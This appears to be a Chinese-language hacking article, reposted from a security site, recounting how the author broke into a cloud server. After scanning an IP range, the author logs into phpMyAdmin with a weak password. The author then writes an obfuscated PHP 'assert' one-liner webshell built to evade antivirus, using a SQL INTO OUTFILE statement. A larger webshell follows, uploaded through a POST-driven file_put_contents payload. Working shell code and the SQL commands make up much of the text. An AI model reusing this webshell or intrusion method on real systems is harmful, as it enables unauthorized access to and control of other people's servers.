自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

解讀木馬GetShell的另類姿勢(shì)

作者:冰海
安全 黑客攻防
其實(shí)吧,之前是想寫一長(zhǎng)篇小說的,把整個(gè)過程詳細(xì)的寫一遍,怕各位看官拍磚,轉(zhuǎn)了話風(fēng) ……

0×00 工欲善其事,必先利其器

其實(shí)吧,之前是想寫一長(zhǎng)篇小說的,把整個(gè)過程詳細(xì)的寫一遍,怕各位看官拍磚,轉(zhuǎn)了話風(fēng) ……

[[150544]]

中間件:

XAMPP(能運(yùn)行PHP程序即可)

‍‍武器:

Chrome瀏覽器、Proxy SwitchySharp代理插件、Advanced REST client插件(核武器)

‍‍函數(shù):

file_put_contents()、urlencode()、urldecode()、php_strip_whitespace() -- PHP函數(shù)

0×01 上小馬

掃C段時(shí)發(fā)現(xiàn)一機(jī)器有phpMyAdmin服務(wù),就嘗試了一下弱口令,root123果斷進(jìn)入,然后就開始了下面的故事。

探測(cè)IP為阿里云服務(wù)器,普通的一句話木馬一寫入就被殺掉,后改為混淆一句話木馬:

  1. <?php                  
  2. @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';                    
  3. @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';                    
  4. @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}                    
  5. [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);  
  6. //密碼-7    
  7. ?> 

一句話木馬原形:

  1. assert($_POST[-7]); 

寫入一句話木馬SQL(網(wǎng)站路徑從phpinfo.php獲得,其它姿勢(shì)亦可):

  1. use test;  
  2. drop table if exists temp;  
  3. create table temp (cmd text NOT NULL);  
  4. insert into temp (cmd) values("<?php @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r'; @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t'; @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> ");  
  5. select cmd from temp into outfile 'D:/phpStudy/WWW/phpMyAdmin/indxe.php';  
  6. drop table if exists temp; 

木馬GetShell的另類姿勢(shì)

 

0×02 處理大馬

解讀木馬GetShell的另類姿勢(shì)

 

用菜刀連接一句話木馬,連接上后即提示"連接被重置",估計(jì)是屏蔽了本機(jī)的出口IP,用VPN、切換代理后同樣的問題還是會(huì)即時(shí)出現(xiàn),所以放棄用菜刀上傳webshell,嘗試手工post的方法。

這里需要先確定下服務(wù)器上file_put_contents()函數(shù)是否執(zhí)行,可行的話再執(zhí)行下面的操作。

首先在本地把大馬處理好以便于作為post參數(shù):

用到了strip_whitespace()函數(shù)【返回已刪除PHP注釋以及空白字符的源代碼文件】,urlencode()函數(shù)【對(duì)字符串進(jìn)行url編碼處理】,file_get_contents()函數(shù)【讀取txt文件內(nèi)容】。

C盤根目錄下需要放一個(gè)strip_shell.php文件(待strip_whitespace的php大馬),新建strip.php文件和urlencode.php文件,兩文件內(nèi)容分別為(注意兩個(gè)函數(shù)參數(shù)):

  1. strip.php:  
  2. <?php  
  3. echo php_strip_whitespace('strip_shell.php');  
  4. ?>  
  5. urlencode.php:  
  6. <?php  
  7. echo urlencode(file_get_contents('urlencode_shell.php'));  
  8. ?> 

執(zhí)行過程如下(注意文件名稱變化和執(zhí)行順序):

解讀木馬GetShell的另類姿勢(shì)

 

所有文件如下:

解讀木馬GetShell的另類姿勢(shì)

 

其中urldecode.php文件為最終處理的文件,文件內(nèi)容如下:

解讀木馬GetShell的另類姿勢(shì)

 

0×03 GetShell

最后請(qǐng)出主角Advanced REST client插件,長(zhǎng)這樣:

解讀木馬GetShell的另類姿勢(shì)

 

這里只需用到POST方法,上面一句話小馬的密碼為-7,即這里Payload模塊的key為-7,參數(shù)重要部分如下:

  1. file_put_contents("D:/phpStudy/WWW/phpMyAdmin/mysqlx.php",urldecode("復(fù)制urldecode.php文件所有內(nèi)容")); 

最后POST表單如下:

解讀木馬GetShell的另類姿勢(shì)

 

至此,成功GetShell,有錯(cuò)誤或好的建議請(qǐng)指正提出。

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
木馬GetShell
相關(guān)推薦

2010-07-12 15:36:45

SQL Server

2010-06-28 14:30:08

SQL Server

2012-11-20 09:49:33

Windows 8操作系統(tǒng)

2013-07-16 14:48:03

大數(shù)據(jù)大數(shù)據(jù)技術(shù)數(shù)據(jù)

2019-07-19 10:44:34

移動(dòng)應(yīng)用APP

2011-05-11 11:10:10

網(wǎng)游病毒營(yíng)銷病毒

2017-07-06 09:33:18

AMDEPYC處理器

2015-03-13 09:30:23

iOS內(nèi)存管理

2020-03-10 18:53:16

移動(dòng)支付另類支付APP

2010-11-23 11:16:35

MySQL表別名

2009-10-23 17:10:27

試用達(dá)人

2011-04-25 13:13:02

Javafinalize

2012-06-15 17:50:26

2013-08-22 17:42:59

2009-03-09 13:59:22

IDC行業(yè)

2009-09-09 16:06:08

對(duì)象

2018-09-21 10:45:54

2014-07-24 09:48:15

getshellgetshell防御主機(jī)敏感文件泄漏

2014-09-25 09:00:57

2025-04-10 07:30:43

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)